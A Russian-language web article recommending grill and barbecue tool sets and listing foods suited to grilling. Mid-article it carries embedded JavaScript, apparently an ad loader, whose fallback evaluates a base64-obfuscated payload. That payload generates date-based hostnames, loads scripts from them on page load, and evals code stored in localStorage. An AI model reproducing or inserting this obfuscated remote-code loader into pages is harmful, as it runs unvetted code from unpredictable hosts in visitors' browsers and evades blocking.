Набор для гриля и барбекю — зачем он нужен

У большинства из нас лето ассоциируется с едой, приготовленной на гриле, неповторимым ароматом с дымком и специями. Чтобы блюда вышли вкусными и правильно приготовленными, необходимо не только специальное место, мангал, продукты, пряности, дрова или угли, а также инструменты, то есть набор для гриля и барбекю, позволяющий быстрее, безопаснее справиться с обжаркой на открытом огне.

Какие принадлежности нужны?

Чтобы готовить пищу на улице, в любимом саду или возле речки, нужны различные инструменты, в частности:

Гриль — он может быть электрическим, газовым или на углях. Чем дальше от дома, тем более независимый агрегат нужен. В зоне досягаемости коммуникаций, можно использовать электрический гриль или на газу. В отдаленной местности, лучше пользоваться углями, да и еда ароматнее.Кухонные щипцы — нужны для того, чтобы переворачивать продукты, при этом не обжечься, не попасть под воздействие высокой температуры.Длинная вилка — позволяет проверить готовность мяса, развернуть в нужную сторону, эффективно наколоть, переложить на поднос или посуду для подачи.Решетка — с ее помощью возможно готовить не только мясные изделия, но и рыбу, овощи. Удобно обжаривать со всех сторон, большая площадь продукта задействована и быстрее доходит до готовности.Лопатка — среднее между щипцами и вилкой, с ее помощью комфортно переворачивать продукты. Она удобная, простая в использовании.Кисть для нанесения соусов — в некоторых случаях, во время тепловой обработки, необходимо смазать маринадом, соком, маслом и т.п. Специальная щеточка поможет легко и быстро это сделать.

Кроме упомянутых инструментов, могут понадобиться еще шампура и щетки для устранения гари и грязи с посуды. Практичнее приобретать готовые наборы для гриля и барбекю, которые содержат все необходимые инструменты, тогда не нужно подбирать по отдельности каждую принадлежность, тратить время и средства. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Что можно готовить на гриле?

Любители барбекю готовят разнообразные продукты. Самым распространенным блюдом являются колбаски различных видов, рецептуры. Их легко, быстро готовить, к тому же вкусно и сытно. Также подойдет для запекания на углях:

Мясо — обычно имеется в виду шашлык, но в последнее время, все чаще можно встретить стейк, свиную шейку, даже рульку. Не менее популярным является диетическое мясо курицы, индейки, кролика. Реже встречается говядина и баранина.Овощи — ограничений в приготовлении овощей на гриле практически нет. Хорошо сочетаются с мясом или являются самостоятельным блюдом — картошка, сладкий перец, лук, грибы, морковь и т.п.Сир — не менее интересным вариантом может быть твердый сыр. Его можно добавлять к мясным изделиям, плавить и подавать в виде фондю.Рыбу — иногда, в качестве диетического блюда или альтернативы к мясным изделиям, можно использовать рыбу. Ее готовить нужно на более густой решетке, так как некоторые виды могут размягчаться, отделяться и проваливаться на тлеющие угли. Как вариант можно применять фольгу для запекания.

Еда, приготовленная на гриле — вкусная, сытная. Набор специальных инструментов облегчает процесс тепловой обработки на тлеющих углях, поэтому важно его приобрести и получать удовольствие от отдыха на природе с любимым лакомством. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/nabor-dlya-grilya-i-barbekyu-zachem-on-nuzhen/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top